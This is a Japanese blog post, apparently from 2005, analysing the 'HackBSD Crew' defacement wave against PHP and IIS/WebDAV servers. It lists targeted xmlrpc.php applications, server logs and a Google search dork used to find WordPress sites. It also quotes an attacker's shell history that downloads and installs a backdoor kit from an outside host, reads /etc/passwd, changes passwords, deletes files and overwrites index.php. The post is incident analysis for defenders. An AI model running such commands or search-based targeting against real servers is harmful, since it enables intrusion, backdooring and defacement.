作る奴のほうが検収する側よりプログラミング優秀だから作っているわけで。
そういうのを防ぐためにオープンソースがありますが、REDHATのように自力コンパイルが面倒でバイナリを買うような時代ですし、
膨大なLinuxの全ソースを監視できているのかな？＞リーナス・トーバルズさん
ＯＳＳに対して、帆場なら元ソースにはウイルスを表示させないで、コンパイラリンカを便利に見せかけてシェアを獲得し、そこにウイルス仕込んでたりしそう。

（2005/10/17）
■Windows版HackBSDだとphpは関係無い？

２００５年８月２３日から数日間に国内で集中発生した「hackbsd crew」は８割方が「windows2000＆IIS5」という組み合わせでした。
改竄情報サイトにもphpが動作してたとは記載がない。
そこでこのバージョンの組み合わせならば、win版hackbsd改竄はマイクロソフトのwebdavの脆弱性を突かれている可能性があります。特に2K&IIS5はやばかったですし。（２００３年には既知な脆弱性だった）
win版『HackBSD Crew侵入』はこういうところを突かれたのかも。
WEBDAV自体は拡張httpなのでUNIXでも組み込まれているでしょうが、UNIXならPHP経路侵入なのでしょうか。
被害にあったところから伺った、webDAVを突いて侵入する手口は、
・侵入者のクライアントがUNIXコマンドライン型WebDAVクライアントcadaver/Neonを名乗っている
　（UAにcadaver/Neonと表示されている）
・webDAVをサーバで有効にしているぐらいの無防備IISだと、書込もeveryone属性になっているだろうから、ＯＳの権限を乗っ取らずともリモートからＩＩＳでファイルをputしてしまうらしい。
というわけで、この場合は侵入原因としてＰＨＰは関係ないことになります。
まぁ、まともな？クラックツールならあらゆる脆弱性を試す仕掛けになっているでしょうから、Windowsへの侵入にはwebDAVでない方法も悪用されることでしょう。
いずれにしても、新たな脆弱性を突いたわけではなく、２００３年あたりから既に知られている手法で今なお侵入されている場合がほとんどのようです＞サーバ書き換え事件

（2005/8/30追加）
情報元サイトのドイツ語訳をコメントにいただきました。ありがとうございます。
しかし現在も相変わらず改竄されている国内の半分はwin版ですが、こっちはどういう被害（書き換え＆削除）なのでしょう。
世間的にニュースにならないからこのまま淡々と？さみだれ的に改竄され、各所で慌てて個別対処な流れなのでしょうか。

（元本文）
2005/8/23あたりに国内で多く被害が出ているので情報まとめ。
Windows系セキュリティアラートだとネットニュースや総務省から全国への注意喚起も（マイクロソフトの代理店か？と思えるくらいに）行われていますが、ＰＨＰのこうした情報はどこにアナウンスされているのだろう？
見つけきれずに自分で集めたので折角だから記録。

■トラブル事象
ＷＥＢサーバがリモートからクラックされ、html改ざんや内部ファイルの削除をされてしまう。

■トラブル詳細

日本での初出は２００４年から既にあったようですが
www.zone-h.org
2005/8/23に特に多発したサーバ改ざんが『HackBSD Crew 0wnz You @ [g0d]』。
これはHackBSDとしてのcrew以外にも亜種があります。サーバの乗っ取りに成功すると、
ＷＷＷルートディレクトリ直下に「/hackbsd.html」という犯行声明を残していく。
文面は、以下のようなもの。

　HackBSD Crew 0wnz You @ [g0d]
　Whe are not Criminals, Looking for one?, Go to the white house!
　eu.undernet.org #hackbsd
　Whe are: EL_S0MBRA,dope|man,bebo,jsz,jank0,[g0d],RockyCroW

■攻撃の手口

これがなかなか情報が見つからない。
検索でもHACKBSDにクラックされたサーバを単に晒す情報しか見当たらず。
情報の元をたどって、サイトを見つけました。
どうもここが詳細に症状をレポートしてるらしいのですが、ドイツ語なので読めない…
http://haftbar.de/2005/08/11/hackbsd-crew-0wnz-y0u-jank0

■攻撃を受けるソフトウェア？
Serendipity Weblog (serendipity_xmlrpc.php)
Drupal (xmlrpc.php)
TikiWiki (xmlrpc.php)
phpMyFAQ (xmlrpcs.php)
Wordpress < 1.5
phpAdsNew
eGroupware (not yet verified)
phpGroupware (not yet verified)

■攻撃を受けたときの（関係するらしい）httpログ
230.xx - - [09/Aug/2005:19:52:41 +0200]
　"POST /xmlrpc.php HTTP/1.0" 200 524 "-" "-"
200.88.29.xx - - [10/Aug/2005:04:15:35 +0200]
　"GET /~manaus/wp-login.php HTTP/1.1" 200 1339 "http://www.google.com.do/search?q=allinurl%3A+%2Fwp-login.php+site%3Ade&hl=es" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:36 +0200]
　"GET /~manaus/wp-admin/wp-admin.css HTTP/1.1" 200 6074 "http://haftbar.de/~manaus/wp-login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:38 +0200]
　"GET /~manaus/wp-images/wp-small.png HTTP/1.1" 200 1416 "http://haftbar.de/~manaus/wp-login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:43 +0200]
　"GET /~manaus/xmlrpc.php HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.234.2.xx - - [10/Aug/2005:04:16:00 +0200]
　"POST /~manaus/xmlrpc.php HTTP/1.1" 200 139 "-" "-"
218.234.2.xx - - [10/Aug/2005:04:16:06 +0200]
　"POST /~manaus/xmlrpc.php HTTP/1.1" 200 113 "-" "-"
218.234.2.xx - - [10/Aug/2005:04:16:24 +0200]
　"POST /~manaus/xmlrpc.php HTTP/1.1" 200 76 "-" "-"

■侵入突破されたあとのtelnetログ
wget freewebs.com/REMOVED/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4;./setup 0ri0n 6000
cat /etc/passwd
passwd postgres
cd /home/manaus/public_html;ls
rm xml*
cd /var/www;ls
cd haftbar.de;ls
cd htdocs;ls
echo hackbsd Crew 0wnz y0u! @ jank0 >index.php;
rm xm*
cd /tmp;
rm *.txt killall -9 r0nin.txt

以上を自己勝手に解釈させて書かせていただきますと↓下のような流れ

■PHPが稼動しているサーバが狙われる。
国内セキュリティ監視ニュースサイト↓
JPドメインWeb改竄速報　http://izumino.jp/Security/def_jp.html
これらの改ざんでの共通点は、
Microsoft-IIS/5.0＆Windows2000、または、Apache/1.3.31 PHP/4.3.8 Linux
ＯＳよりもPHPであるかどうかが重要？

■PHPが稼動しているかのping-aliveのため「wp-login.php」を手がかりにしている
今年2005年５月の価格.comの騒動ではSQLインジェクションが話題でしたが、あの時それよりも多く被害が出ていたのはphpBBの脆弱性を突かれたサーバ改ざんでした。
その時の手口が『PHPサーバを探すためにgoogleを利用し、Powered by phpBB Version…の文字列を含むサイトを探してから攻撃に入る』というものでした。
（これは既に去年の段階で、Googleを利用し.ASP .JSP .PHP .PHTM .SHTMあたりを探し回る手口のワームがあったようです）
これと同じように、今回は、
http://www.google.co.jp/search?complete=1&hl=ja&c2coff=1&q=allinurl%3A%2Fwp-login.php+site%3Ajp&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
このように「allinurl:/wp-login.php site:jp」で目星をつけていたようです。

■httpポート経由でPOSTやGETをPHPに仕掛けてクラックする？
サーバを見つけるとPHPへリクエスト攻撃するわけですが、
なぜここでＯＳの管理者権限が乗っ取られるかが不明です。
HackBSDを名乗る手口自体は2004.12時点で既出ですが、今回が同じ痕跡名でも侵入手法が同一かは断言できません。
単に未パッチ放置だったサイトばかりであれば手法は古典的なままなのかもしれませんし、乗っ取り部分だけ新型なのかもしれませんし。

■乗っ取られたあとは…いろいろやられ放題？
もっとひどい悪さをできそうですが『HackBSD Crew』では犯行声明ページで
『Whe are not Criminals』と主張してます。が、
それと並行して、ＵＮＩＸ系の場合は、
一部のファイルのremove、passwdファイルの書き換え、freewebs.com/REMOVED/shv4.tar.gzをダウンロードしてそれのsetupをやってるようです。
（shv4.tar.gzはかなり古いexploitsのアーカイブでアングラにごろごろあるクラックツール）
あとwin2k＋IISの環境でも侵入されています。こっちもコマンドラインとかバッチで自動的にサーバ内を好き勝手しているのでしょうが、UNIXのhisのようにコマンド履歴が残っているかどうかが怪しい（IISでやられた事例ログを収集中ですが見当たらず）。それに痕跡をも削除するマクロなのがデフォでしょうし。
そのため手掛かりが少なく手口解明がより難しいかもしれません＞win版PHPの場合。
shv4.tar.gzがwinでは動きませんから別の何かを仕掛ける手口かもしれませんし。

■echoでhackbsd声明文ファイルをサイトに蔵置する
「ファイルの蔵置」は公用な表現ですが、これによりやられたことが判るわけです。
改竄サイトを検出している所はよくまぁ見つけますね？？

■ドイツのそのレポサイトによればバックドアも仕掛ける？
「telnet backdoor port 1666」ともあります。

今回の攻撃も既知の脆弱性を相変わらず突いたものであるならば、
ネットには無防備＆放置なサーバがまだまだ多いということでしょうか。
先のgoogle検索では３００件ぐらいヒットしますので、まだまだ攻撃は続くかも？
（2011年に検索してもまだヒットする．．．この中に相変わらず無防備な作りのがあるのか）
とりあえず過去（2004年）の乗っ取り手法を調べたのですが、検索してみて日経ＢＰに技術的な手口解説の記事がありました。
（引用元は英語ばかりで国内から発信されてないようです）
この時のPhpInclude.Worm（Santy.e）というワームはPHPの関数「Include()」や「Require()」を不適切に使うことで発生する「File Inclusion Flaw」現象を悪用する。よってセキュリティホールというよりＳＱＬインジェクションのようにプログラム設定ミスを突いたものでした。よって広範囲のPHPが該当したそうです。
PHPを狙うワームが出現，Webページのプログラム・ミスを突く　2004.12
記事にあるようにすぐ亜種が出現し、セキュリティホールも攻撃する複合タイプも出現しているため、最新のセキュアな状態に維持し続けることが肝要と思われます。

アドバイザリで２００４年１２月のＰＨＰ脆弱性解説を見つけましたが、英文です。
http://secunia.com/advisories/13481/
その後はＰＨＰに関しては２００５年４月にＤｏＳを受ける脆弱性が報告されてますが、
現在は特に何もアドバイザリは出ていません。＞ＰＨＰ
となると、一番のhackBSDの原因は新手の攻撃でなく、この２００４年１２月の脆弱性が残っているに過ぎない？